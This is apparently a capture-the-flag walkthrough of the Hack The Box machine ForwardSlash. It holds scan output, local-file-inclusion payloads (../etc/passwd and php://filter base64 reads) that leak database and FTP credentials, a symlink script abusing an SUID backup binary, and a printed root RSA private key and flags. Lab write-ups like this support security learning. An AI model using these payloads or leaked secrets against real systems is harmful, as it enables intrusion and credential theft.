NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-02 10:20 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Initiating Ping Scan at 10:20
Scanning 10.10.10.183 [4 ports]
Completed Ping Scan at 10:20, 1.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:20
Scanning forwardslash.htb (10.10.10.183) [1000 ports]
Discovered open port 80/tcp on 10.10.10.183
Discovered open port 22/tcp on 10.10.10.183
Completed SYN Stealth Scan at 10:20, 4.20s elapsed (1000 total ports)
Initiating Service scan at 10:20
Scanning 2 services on forwardslash.htb (10.10.10.183)
Completed Service scan at 10:20, 6.66s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against forwardslash.htb (10.10.10.183)
Retrying OS detection (try #2) against forwardslash.htb (10.10.10.183)
Retrying OS detection (try #3) against forwardslash.htb (10.10.10.183)
Retrying OS detection (try #4) against forwardslash.htb (10.10.10.183)
Retrying OS detection (try #5) against forwardslash.htb (10.10.10.183)
Initiating Traceroute at 10:20
Completed Traceroute at 10:20, 0.38s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 10:20
Completed Parallel DNS resolution of 2 hosts. at 10:20, 0.34s elapsed
NSE: Script scanning 10.10.10.183.
Initiating NSE at 10:20
Completed NSE at 10:20, 12.12s elapsed
Initiating NSE at 10:20
Completed NSE at 10:20, 2.25s elapsed
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Nmap scan report for forwardslash.htb (10.10.10.183)
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3c:3b:eb:54:96:81:1d:da:d7:96:c7:0f:b4:7e:e1:cf (RSA)
| 256 f6:b3:5f:a2:59:e3:1e:57:35:36:c3:fe:5e:3d:1f:66 (ECDSA)
|_ 256 1b:de:b8:07:35:e8:18:2c:19:d8:cc:dd:77:9c:f2:5e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Backslash Gang
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/2%OT=22%CT=1%CU=40458%PV=Y%DS=2%DC=T%G=Y%TM=5ED5DAB3
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Uptime guess: 39.164 days (since Fri Apr 24 06:25:14 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 378.15 ms 10.10.14.1
2 378.15 ms forwardslash.htb (10.10.10.183)
NSE: Script Post-scanning.
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.82 seconds
Raw packets sent: 1193 (56.566KB) | Rcvd: 1151 (49.594KB)
PORT 80 ENUMERATION
which has nothing interesting so lets fuzz this directory
we got a file named note.txt
After reading that note i assume their is backup site which we can access.
So i tried backupsite.htb backup.htb and many more and i got one working backup.forwardslash.htbso added this up to hosts file and accessed it
I fuzzed The url got some pages and a directory here!!
root@liquid:~/Desktop/HTB/forwardslash# gobuster dir -u http://backup.forwardslash.htb/ -w /usr/share/wordlists/wfuzz/general/big.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://backup.forwardslash.htb/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/wfuzz/general/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/06/02 11:30:44 Starting gobuster
===============================================================
/config.php (Status: 200)
/dev (Status: 301)
/index.php (Status: 302)
/logout.php (Status: 302)
/login.php (Status: 200)
Progress: 2184 / 3025 (72.20%)^C[A
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/06/02 11:35:00 Finished
===============================================================
It has some login page so I signed up for this and went to enumerate more
I went through every page but i found nothing but their is page as Change Profile Picture
Their was link bar where we can input any url so I enabled it <br>Then as usual I tried for ../../../../../../etc/passwd
It worked as LFI
So i tried to get those files at first which we got above during fuzzing.. Because we cannot directly access those files due to encoded php files
I got interesting things in both files
Command to access those files:
php://filter/convert.base64-encode/resource=/dev/index.php php://filter/convert.base64-encode/resource=config.php
Cnfig.php
<!--?php
//credentials for the temp db while we recover, had to backup old config, didn't want it getting compromised -pain
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'www-data');
define('DB_PASSWORD', '5iIwJX0C2nZiIhkLYE7n314VcKNx8uMkxfLvCTz2USGY180ocz3FQuVtdCy3dAgIMK3Y8XFZv9fBi6OwG6OYxoAVnhaQkm7r2ec');
define('DB_NAME', 'site');
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($link === false){
die("ERROR: Could not connect. " . mysqli_connect_error());
}
?-->/dev/index.ph
<?php
if ($_SERVER['REQUEST_METHOD'] === "GET" && isset($_GET['xml'])) {
$reg = '/ftp:\/\/[\s\S]*\/\"/';
//$reg = '/((((25[0-5])|(2[0-4]\d)|([01]?\d?\d)))\.){3}((((25[0-5])|(2[0-4]\d)|([01]?\d?\d))))/'
if (preg_match($reg, $_GET['xml'], $match)) {
$ip = explode('/', $match[0])[2];
echo $ip;
error_log("Connecting");
$conn_id = ftp_connect($ip) or die("Couldn't connect to $ip\n");
error_log("Logging in");
if (@ftp_login($conn_id, "chiv", 'N0bodyL1kesBack/')) {
error_log("Getting file");
echo ftp_get_string($conn_id, "debug.txt");
}
exit;
}chiv : N0bodyL1kesBack/
Here We got password for user in files So lets try these >>>>
SSH LOGIN
root@liquid:~/Desktop/HTB/forwardslash# ssh chiv@10.10.10.183
chiv@10.10.10.183's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jun 2 07:43:48 UTC 2020
System load: 0.08 Processes: 196
Usage of /: 30.6% of 19.56GB Users logged in: 2
Memory usage: 18% IP address for ens33: 10.10.10.183
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
16 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Jun 2 06:17:58 2020 from 10.10.14.63
chiv@forwardslash:~$ id
uid=1001(chiv) gid=1001(chiv) groups=1001(chiv)
But still we dont have access to user flag so for that we need to get user pain account
Lets enumerate more and more we found some backup things going on
backup file with SUID
config.php.bak with only pain’s access
After looking at those I came to know that we need md5sum timestamp crap
and I am not familiar to that so asked my friend to help me out
He gave me idea to make script in bash to get this working !!
Here it is ::
#!/bin/bash
i=$(backup | grep ERROR | awk '{print $2}');
ln -s /var/backups/config.php.bak /home/chiv/$i;
/usr/bin/backup;I created this with help of him!!
Here we got the password of pain !!
pain : db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704
Lets Grab user.txt
pain@forwardslash:~$ cat user.txt
59f0c1034a3074b6bc6d87316a118810
GETTING ROOT ACCESS
pain@forwardslash:~/encryptorinator$ sudo -l
Matching Defaults entries for pain on forwardslash:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pain may run the following commands on forwardslash:
(root) NOPASSWD: /sbin/cryptsetup luksOpen *
(root) NOPASSWD: /bin/mount /dev/mapper/backup ./mnt/
(root) NOPASSWD: /bin/umount ./mnt/
<br>
So it was difficult for me because I dont know crypto scripts SO again I took help and got password
I am actually waiting for IPPSECS video to understand this thing
So I ran command where we will decrypt img and get decrypted part in backup file which we cannot directly access as it is owned by root but we can mount it as mount has SUID
So after running these commands I got output like this
pain@forwardslash:~/encryptorinator$ sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup
Enter passphrase for /var/backups/recovery/encrypted_backup.img:
pain@forwardslash:~/encryptorinator$ sudo /bin/mount /dev/mapper/backup ./mnt/
mount: ./mnt/: mount point does not exist.
pain@forwardslash:~/encryptorinator$ mkdir mnt
pain@forwardslash:~/encryptorinator$ sudo /bin/mount /dev/mapper/backup ./mnt/
pain@forwardslash:~/encryptorinator$ cd mnt/
pain@forwardslash:~/encryptorinator/mnt$ ls
id_rsa
pain@forwardslash:~/encryptorinator/mnt$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA9i/r8VGof1vpIV6rhNE9hZfBDd3u6S16uNYqLn+xFgZEQBZK
RKh+WDykv/gukvUSauxWJndPq3F1Ck0xbcGQu6+1OBYb+fQ0B8raCRjwtwYF4gaf
yLFcOS111mKmUIB9qR1wDsmKRbtWPPPvgs2ruafgeiHujIEkiUUk9f3WTNqUsPQc
u2AG//ZCiqKWcWn0CcC2EhWsRQhLOvh3pGfv4gg0Gg/VNNiMPjDAYnr4iVg4XyEu
NWS2x9PtPasWsWRPLMEPtzLhJOnHE3iVJuTnFFhp2T6CtmZui4TJH3pij6wYYis9
MqzTmFwNzzx2HKS2tE2ty2c1CcW+F3GS/rn0EQIDAQABAoIBAQCPfjkg7D6xFSpa
V+rTPH6GeoB9C6mwYeDREYt+lNDsDHUFgbiCMk+KMLa6afcDkzLL/brtKsfWHwhg
G8Q+u/8XVn/jFAf0deFJ1XOmr9HGbA1LxB6oBLDDZvrzHYbhDzOvOchR5ijhIiNO
3cPx0t1QFkiiB1sarD9Wf2Xet7iMDArJI94G7yfnfUegtC5y38liJdb2TBXwvIZC
vROXZiQdmWCPEmwuE0aDj4HqmJvnIx9P4EAcTWuY0LdUU3zZcFgYlXiYT0xg2N1p
MIrAjjhgrQ3A2kXyxh9pzxsFlvIaSfxAvsL8LQy2Osl+i80WaORykmyFy5rmNLQD
Ih0cizb9AoGBAP2+PD2nV8y20kF6U0+JlwMG7WbV/rDF6+kVn0M2sfQKiAIUK3Wn
5YCeGARrMdZr4fidTN7koke02M4enSHEdZRTW2jRXlKfYHqSoVzLggnKVU/eghQs
V4gv6+cc787HojtuU7Ee66eWj0VSr0PXjFInzdSdmnd93oDZPzwF8QUnAoGBAPhg
e1VaHG89E4YWNxbfr739t5qPuizPJY7fIBOv9Z0G+P5KCtHJA5uxpELrF3hQjJU8
6Orz/0C+TxmlTGVOvkQWij4GC9rcOMaP03zXamQTSGNROM+S1I9UUoQBrwe2nQeh
i2B/AlO4PrOHJtfSXIzsedmDNLoMqO5/n/xAqLAHAoGATnv8CBntt11JFYWvpSdq
tT38SlWgjK77dEIC2/hb/J8RSItSkfbXrvu3dA5wAOGnqI2HDF5tr35JnR+s/JfW
woUx/e7cnPO9FMyr6pbr5vlVf/nUBEde37nq3rZ9mlj3XiiW7G8i9thEAm471eEi
/vpe2QfSkmk1XGdV/svbq/sCgYAZ6FZ1DLUylThYIDEW3bZDJxfjs2JEEkdko7mA
1DXWb0fBno+KWmFZ+CmeIU+NaTmAx520BEd3xWIS1r8lQhVunLtGxPKvnZD+hToW
J5IdZjWCxpIadMJfQPhqdJKBR3cRuLQFGLpxaSKBL3PJx1OID5KWMa1qSq/EUOOr
OENgOQKBgD/mYgPSmbqpNZI0/B+6ua9kQJAH6JS44v+yFkHfNTW0M7UIjU7wkGQw
ddMNjhpwVZ3//G6UhWSojUScQTERANt8R+J6dR0YfPzHnsDIoRc7IABQmxxygXDo
ZoYDzlPAlwJmoPQXauRl1CgjlyHrVUTfS0AkQH2ZbqvK5/Metq8o
Here we go with root id_rsa
root@liquid:~/Desktop/HTB/forwardslash# vi id_rsaroot
root@liquid:~/Desktop/HTB/forwardslash# chmod 600 id_rsaroot
root@liquid:~/Desktop/HTB/forwardslash# ssh -i id_rsaroot 10.10.10.183
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jun 2 06:55:21 UTC 2020
System load: 0.05 Processes: 190
Usage of /: 30.6% of 19.56GB Users logged in: 1
Memory usage: 18% IP address for ens33: 10.10.10.183
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
16 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Mar 24 12:11:46 2020 from 10.10.14.3
root@forwardslash:~# ls
root.txt
root@forwardslash:~# cat root.txt
e78febc4934fdb81bb3b6fe14ca9dedd
So Here we are done this machine !!
I learnt lot of things from this machine
Yes it was difficult for me as crypto part took me longest
But I covered whole of this
Still crypto is difficult for me and need to know more about it
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
Leave a Reply